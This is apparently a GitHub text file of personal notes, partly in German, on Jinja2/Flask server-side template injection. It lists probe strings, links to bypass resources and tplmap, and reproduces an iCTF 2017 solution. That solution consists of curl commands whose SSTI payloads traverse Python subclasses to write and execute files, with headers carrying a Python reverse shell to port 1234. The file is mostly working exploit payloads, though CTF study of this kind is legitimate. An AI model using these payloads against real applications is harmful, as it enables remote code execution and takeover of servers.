-
Notifications
You must be signed in to change notification settings - Fork 4
/
template_injection.txt
55 lines (36 loc) · 2.16 KB
/
template_injection.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
https://twitter.com/Alra3ees/status/1087717418057809920
https://0day.work/jinja2-template-injection-filter-bypasses/
a{{bar}}b -> ab oder error
a{{7*7}}b -> 49
{var} ${var} {{var}} <%var%> [%var%] -> bei flask war {{var}} dann weg
{var1} ${var2} {{var3}} <%var4%> [%var5%]
grundsätzlich alles was zurückkommt /wie xss
auch die url checken (404 ...)
https://gist.github.com/quantumfoam/fec4ab9083133523f489
https://github.com/epinna/tplmap
iCTF 2017 (flasking unicorn):
their solution
curl 'localhost:8080/?
next={{request.__class__.__mro__[8].__subclasses__()[40](request.headers[request.headers.keys()[6]],request.headers[request.headers.keys()[6]][5]).write(request.headers[request.headers.keys()[4]])}}{{config.from_pyfile(request.headers[request.headers.keys()[6]])}}'
-g
-H "x-f: /tmp/w"
-H 'x-p: import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
object:
request.__class__.__mro__[8]
file
request.__class__.__mro__[8].__subclasses__()[40]
file.open()
request.__class__.__mro__[8].__subclasses__()[40](request.headers[request.headers.keys()[0]])
file.read()
request.__class__.__mro__[8].__subclasses__()[40](request.headers[request.headers.keys()[0]]).read()
file.write()
request.__class__.__mro__[8].__subclasses__()[40](request.headers[request.headers.keys()[0]],request.headers[request.headers.keys()[4]]).write(request.headers[request.headers.keys()[2]])
' hat unendlich probleme gemacht ....deswegen dritter header mit 2 (oder viel besser anderer_header[x])
request.headers[request.headers.keys()[0]]
request.headers[request.headers.keys()[2]]
request.headers[request.headers.keys()[4]]
-H "file: /tmp/code"
-H 'content: import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("localhost",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
-H "write: w"
code execution with
curl -v -g "localhost:8080/?next={{config.from_pyfile(request.headers[request.headers.keys()[0]])}}" -H "file: /tmp/code" -H "content: 123"